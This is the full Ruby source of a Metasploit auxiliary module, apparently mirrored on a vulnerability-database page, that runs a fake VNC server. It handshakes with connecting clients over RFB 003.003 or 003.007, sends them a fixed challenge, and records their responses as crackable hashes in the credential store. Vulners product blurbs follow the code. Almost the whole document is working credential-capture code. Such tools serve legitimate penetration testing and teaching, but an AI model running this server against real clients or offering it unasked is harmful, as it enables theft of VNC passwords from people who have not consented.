##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::TcpServer
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Authentication Capture: VNC',
'Description' => %q{
This module provides a fake VNC service that
is designed to capture authentication credentials.
},
'Author' => 'Patrik Karlsson <patrik[at]cqure.net>',
'License' => MSF_LICENSE,
'Actions' => [[ 'Capture', { 'Description' => 'Run VNC capture server' } ]],
'PassiveActions' => [ 'Capture' ],
'DefaultAction' => 'Capture'
)
register_options(
[
OptPort.new('SRVPORT', [ true, 'The local port to listen on.', 5900 ]),
OptString.new('CHALLENGE', [ true, 'The 16 byte challenge', '00112233445566778899AABBCCDDEEFF' ])
]
)
end
def setup
super
@state = {}
end
def run
if datastore['CHALLENGE'].to_s =~ /^([a-fA-F0-9]{32})$/
@challenge = [ datastore['CHALLENGE'] ].pack('H*')
else
fail_with(Failure::BadConfig, 'CHALLENGE must be 32 characters, 0-9,A-F.')
end
exploit
end
def on_client_connect(c)
@state[c] = {
name: "#{c.peerhost}:#{c.peerport}",
ip: c.peerhost,
port: c.peerport,
pass: nil,
chall: nil,
proto: nil
}
c.put "RFB 003.007\n"
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :nonreplayable_hash,
jtr_format: Metasploit::Framework::Hashes.identify_hash(opts[:password])
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def on_client_data(c)
data = c.get_once
return if !data
peer = "#{c.peerhost}:#{c.peerport}"
if data =~ /^RFB (.*)\n$/
@state[c][:proto] = Regexp.last_match(1)
if @state[c][:proto] == '003.007'
# for the 003.007 protocol we say we support the VNC sectype
# and wait for the server to acknowledge it, before we send the
# challenge.
c.put [0x0102].pack('n') # 1 sectype, unencrypted
elsif @state[c][:proto] == '003.003'
# for the 003.003 protocol we say we support the VNC sectype
# and immediately send the challenge
sectype = [0x00000002].pack('N')
c.put sectype
@state[c][:chall] = @challenge
c.put @state[c][:chall]
else
c.close
end
# the challenge was sent, so this should be our response
elsif @state[c][:chall]
c.put [0x00000001].pack('N')
c.close
print_good("#{peer} - Challenge: #{@challenge.unpack('H*')[0]}; Response: #{data.unpack('H*')[0]}")
hash_line = "*#{@state[c][:chall].unpack('H*')[0]}*#{data.unpack('H*')[0]}"
report_cred(
ip: c.peerhost,
port: datastore['SRVPORT'],
service_name: 'vnc_client',
user: '',
password: hash_line,
proof: hash_line
)
# we have got the protocol sorted out and have offered the VNC sectype (2)
elsif @state[c][:proto] == '003.007'
if (data.unpack('C')[0] != 2)
print_error("#{peer} - sectype not offered! #{data.unpack('H*')}")
c.close
return
end
@state[c][:chall] = @challenge
c.put @state[c][:chall]
end
end
def on_client_close(c)
@state.delete(c)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation